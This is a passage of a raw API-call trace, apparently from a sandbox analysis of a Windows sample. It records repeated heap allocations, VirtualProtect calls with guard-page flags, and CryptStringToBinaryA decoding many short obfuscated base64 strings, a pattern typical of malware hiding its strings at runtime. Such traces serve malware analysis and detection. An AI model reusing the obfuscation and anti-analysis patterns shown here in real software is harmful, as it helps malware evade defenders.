(HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bda88 [0181.133] VirtualProtect (in: lpAddress=0x5bda88, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.133] GetProcessHeap () returned 0x5b0000 [0181.133] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1f) returned 0x5bed20 [0181.133] CryptStringToBinaryA (in: pszString="LkXBEqvUSSJOOg==", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.133] CryptStringToBinaryA (in: pszString="LkXBEqvUSSJOOg==", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.133] GetProcessHeap () returned 0x5b0000 [0181.133] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5be118 [0181.134] VirtualProtect (in: lpAddress=0x5be118, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.134] GetProcessHeap () returned 0x5b0000 [0181.134] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb) returned 0x5beac0 [0181.134] CryptStringToBinaryA (in: pszString="XSCjcN6pMw==", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.134] CryptStringToBinaryA (in: pszString="XSCjcN6pMw==", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.134] GetProcessHeap () returned 0x5b0000 [0181.134] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bdcb8 [0181.134] VirtualProtect (in: lpAddress=0x5bdcb8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.134] GetProcessHeap () returned 0x5b0000 [0181.134] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x8) returned 0x5bed48 [0181.134] CryptStringToBinaryA (in: pszString="UjqyaQ==", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.134] CryptStringToBinaryA (in: pszString="UjqyaQ==", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.134] GetProcessHeap () returned 0x5b0000 [0181.134] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bd0b0 [0181.134] VirtualProtect (in: lpAddress=0x5bd0b0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.134] GetProcessHeap () returned 0x5b0000 [0181.134] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x5) returned 0x5bef10 [0181.134] CryptStringToBinaryA (in: pszString="Ujq2", cchString=0x4, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.134] CryptStringToBinaryA (in: pszString="Ujq2", cchString=0x4, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.135] GetProcessHeap () returned 0x5b0000 [0181.135] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bdee8 [0181.135] VirtualProtect (in: lpAddress=0x5bdee8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.135] GetProcessHeap () returned 0x5b0000 [0181.135] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4) returned 0x5bedf0 [0181.135] CryptStringToBinaryA (in: pszString="UzS/a92iNBoMbXamLZmd", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.135] CryptStringToBinaryA (in: pszString="UzS/a92iNBoMbXamLZmd", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.135] GetProcessHeap () returned 0x5b0000 [0181.135] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5be348 [0181.135] VirtualProtect (in: lpAddress=0x5be348, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.135] GetProcessHeap () returned 0x5b0000 [0181.135] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x10) returned 0x5bebf8 [0181.135] CryptStringToBinaryA (in: pszString="LkXBErE=", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.135] CryptStringToBinaryA (in: pszString="LkXBErE=", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.135] GetProcessHeap () returned 0x5b0000 [0181.135] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bd1c8 [0181.135] VirtualProtect (in: lpAddress=0x5bd1c8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.135] GetProcessHeap () returned 0x5b0000 [0181.135] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x6) returned 0x5bef30 [0181.135] CryptStringToBinaryA (in: pszString="XByfQ/WEAg==", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.135] CryptStringToBinaryA (in: pszString="XByfQ/WEAg==", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.136] GetProcessHeap () returned 0x5b0000 [0181.136] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5be460 [0181.136] VirtualProtect (in: lpAddress=0x5be460, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.136] GetProcessHeap () returned 0x5b0000 [0181.136] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x8) returned 0x5bee10 [0181.136] CryptStringToBinaryA (in: pszString="QjeYTPqJBCt9", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.136] CryptStringToBinaryA (in: pszString="QjeYTPqJBCt9", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.136] GetProcessHeap () returned 0x5b0000 [0181.136] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bd3f8 [0181.136] VirtualProtect (in: lpAddress=0x5bd3f8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.136] GetProcessHeap () returned 0x5b0000 [0181.136] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5bea90 [0181.136] CryptStringToBinaryA (in: pszString="fwWBD+iTCDxEcyzlcsc=", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.136] CryptStringToBinaryA (in: pszString="fwWBD+iTCDxEcyzlcsc=", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.136] GetProcessHeap () returned 0x5b0000 [0181.136] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bd510 [0181.136] VirtualProtect (in: lpAddress=0x5bd510, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.136] GetProcessHeap () returned 0x5b0000 [0181.136] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xf) returned 0x5be970 [0181.137] CryptStringToBinaryA (in: pszString="XRqYTPSKDg==", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.137] CryptStringToBinaryA (in: pszString="XRqYTPSKDg==", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.137] GetProcessHeap () returned 0x5b0000 [0181.137] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bd858 [0181.137] VirtualProtect (in: lpAddress=0x5bd858, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.137] GetProcessHeap () returned 0x5b0000 [0181.137] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x8) returned 0x5beda0 [0181.137] CryptStringToBinaryA (in: pszString="QjaeS/WICid9Hin/c8bBMwcuK9fB0R3HTw==", cchString=0x24, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.137] CryptStringToBinaryA (in: pszString="QjaeS/WICid9Hin/c8bBMwcuK9fB0R3HTw==", cchString=0x24, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.137] GetProcessHeap () returned 0x5b0000 [0181.137] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bfdc0 [0181.137] VirtualProtect (in: lpAddress=0x5bfdc0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.137] GetProcessHeap () returned 0x5b0000 [0181.137] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1a) returned 0x5c0f68 [0181.137] CryptStringToBinaryA (in: pszString="NFuGQ/eLAjo=", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.137] CryptStringToBinaryA (in: pszString="NFuGQ/eLAjo=", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.138] GetProcessHeap () returned 0x5b0000 [0181.138] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bfed8 [0181.138] VirtualProtect (in: lpAddress=0x5bfed8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.138] GetProcessHeap () returned 0x5b0000 [0181.138] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x9) returned 0x5bead8 [0181.138] CryptStringToBinaryA (in: pszString="NFuSTfWBDik=", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.138] CryptStringToBinaryA (in: pszString="NFuSTfWBDik=", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.138] GetProcessHeap () returned 0x5b0000 [0181.138] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c0680 [0181.138] VirtualProtect (in: lpAddress=0x5c0680, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.138] GetProcessHeap () returned 0x5b0000 [0181.138] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x9) returned 0x5bec10 [0181.138] CryptStringToBinaryA (in: pszString="NAKQTveCE2QPOSfi", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.138] CryptStringToBinaryA (in: pszString="NAKQTveCE2QPOSfi", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.138] GetProcessHeap () returned 0x5b0000 [0181.138] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bf730 [0181.138] VirtualProtect (in: lpAddress=0x5bf730, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.138] GetProcessHeap () returned 0x5b0000 [0181.138] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd) returned 0x5beaa8 [0181.139] CryptStringToBinaryA (in: pszString="WRCFceKUEytMCS/7eA==", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.139] CryptStringToBinaryA (in: pszString="WRCFceKUEytMCS/7eA==", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.139] GetProcessHeap () returned 0x5b0000 [0181.139] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c0568 [0181.139] VirtualProtect (in: lpAddress=0x5c0568, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.139] GetProcessHeap () returned 0x5b0000 [0181.139] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe) returned 0x5bebc8 [0181.139] CryptStringToBinaryA (in: pszString="cgaFUPiGEw8=", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.139] CryptStringToBinaryA (in: pszString="cgaFUPiGEw8=", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.139] GetProcessHeap () returned 0x5b0000 [0181.139] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bef88 [0181.139] VirtualProtect (in: lpAddress=0x5bef88, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.139] GetProcessHeap () returned 0x5b0000 [0181.139] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x9) returned 0x5be988 [0181.139] CryptStringToBinaryA (in: pszString="TQyCVv6KMydMOBL5W8DAPw8wJ94=", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.139] CryptStringToBinaryA (in: pszString="TQyCVv6KMydMOBL5W8DAPw8wJ94=", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.139] GetProcessHeap () returned 0x5b0000 [0181.139] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c0798 [0181.139] VirtualProtect (in: lpAddress=0x5c0798, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.139] GetProcessHeap () returned 0x5b0000 [0181.139] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5bc7f0 [0181.140] CryptStringToBinaryA (in: pszString="cAGVTvfJAyJN", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.140] CryptStringToBinaryA (in: pszString="cAGVTvfJAyJN", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.140] GetProcessHeap () returned 0x5b0000 [0181.140] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bf960 [0181.140] VirtualProtect (in: lpAddress=0x5bf960, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.140] GetProcessHeap () returned 0x5b0000 [0181.140] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5bebe0 [0181.140] CryptStringToBinaryA (in: pszString="bQaSQ/WB", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.140] CryptStringToBinaryA (in: pszString="bQaSQ/WB", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.140] GetProcessHeap () returned 0x5b0000 [0181.140] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c0338 [0181.140] VirtualProtect (in: lpAddress=0x5c0338, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.140] GetProcessHeap () returned 0x5b0000 [0181.140] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x7) returned 0x5bef40 [0181.140] CryptStringToBinaryA (in: pszString="aRyfS/WCE2BFMSo=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.140] CryptStringToBinaryA (in: pszString="aRyfS/WCE2BFMSo=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.140] GetProcessHeap () returned 0x5b0000 [0181.140] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bfff0 [0181.140] VirtualProtect (in: lpAddress=0x5bfff0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.140] GetProcessHeap () returned 0x5b0000 [0181.140] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5be9a0 [0181.140] CryptStringToBinaryA (in: pszString="awaUUKjVSSpNMQ==", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.140] CryptStringToBinaryA (in: pszString="awaUUKjVSSpNMQ==", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.140] GetProcessHeap () returned 0x5b0000 [0181.141] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c0450 [0181.141] VirtualProtect (in: lpAddress=0x5c0450, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.141] GetProcessHeap () returned 0x5b0000 [0181.141] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb) returned 0x5bea18 [0181.141] CryptStringToBinaryA (in: pszString="eRGYEanJAyJN", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.141] CryptStringToBinaryA (in: pszString="eRGYEanJAyJN", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.141] GetProcessHeap () returned 0x5b0000 [0181.141] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c09c8 [0181.141] VirtualProtect (in: lpAddress=0x5c09c8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.141] GetProcessHeap () returned 0x5b0000 [0181.141] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5beaf0 [0181.141] CryptStringToBinaryA (in: pszString="cBCFQ+uOVHwPOSr6", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.141] CryptStringToBinaryA (in: pszString="cBCFQ+uOVHwPOSr6", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.141] GetProcessHeap () returned 0x5b0000 [0181.141] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bf0a0 [0181.141] VirtualProtect (in: lpAddress=0x5bf0a0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.141] GetProcessHeap () returned 0x5b0000 [0181.141] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd) returned 0x5bea30 [0181.141] CryptStringToBinaryA (in: pszString="bgaQUvLJAyJN", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.141] CryptStringToBinaryA (in: pszString="bgaQUvLJAyJN", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.141] GetProcessHeap () returned 0x5b0000 [0181.141] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bf848 [0181.142] VirtualProtect (in: lpAddress=0x5bf848, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.142] GetProcessHeap () returned 0x5b0000 [0181.142] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5be9b8 [0181.142] CryptStringToBinaryA (in: pszString="fBaDW+uTSSpNMQ==", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.142] CryptStringToBinaryA (in: pszString="fBaDW+uTSSpNMQ==", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.142] GetProcessHeap () returned 0x5b0000 [0181.142] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c08b0 [0181.142] VirtualProtect (in: lpAddress=0x5c08b0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.142] GetProcessHeap () returned 0x5b0000 [0181.142] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb) returned 0x5beb20 [0181.142] CryptStringToBinaryA (in: pszString="aBSETu+ECycPOSr6", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.142] CryptStringToBinaryA (in: pszString="aBSETu+ECycPOSr6", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.142] GetProcessHeap () returned 0x5b0000 [0181.142] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, 